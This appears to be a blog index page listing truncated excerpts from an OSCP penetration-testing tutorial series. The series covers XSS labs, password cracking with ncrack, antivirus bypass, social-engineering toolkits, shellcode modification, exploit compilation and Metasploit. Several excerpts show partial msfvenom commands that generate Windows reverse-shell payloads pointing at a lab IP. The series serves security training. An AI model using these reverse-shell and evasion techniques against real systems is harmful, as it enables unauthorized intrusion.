摘要:
OSCP Security Technology - Cross-Site Scripting(XSS) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Ex 阅读全文
摘要:
OSCP Security Technology - Pre-Exploit Password Attacks Tools 1) ncrack kali@kali:~$ ncrack Ncrack 0.7 ( http://ncrack.org ) Usage: ncrack [Options] { 阅读全文
摘要:
OSCP Security Technology - Antivirus Bypassing Detection Platform: https://www.virustotal.com/gui/ Shell1 msfvenom -p windows/shell_reverse_tcp LHOST= 阅读全文
摘要:
OSCP Security Technology - Java Applet Attack Prepare a target virtual machine - IE11 on Win 7. Set the security level of IE to low, and add a excepti 阅读全文
摘要:
OSCP Security Technology - Client Side Attacks Tool: setoolkit setoolkit S1 --> 1) Social-Engineering Attacks S2 --> 2) Website Attack Vectors S3 --> 阅读全文
摘要:
OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 阅读全文
摘要:
OSCP Security Technology - Compiling an Exploit Search "samba 2.2.1a exploit". Download the source code file from the following website. https://www.e 阅读全文
摘要:
OSCP Security Technology - Gaining Root with Metasploit Analysis nmap scanning result. searchsploit samba 2.2 msfconsole search trans2open use exploit 阅读全文
摘要:
OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_ 阅读全文
摘要:
OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open 阅读全文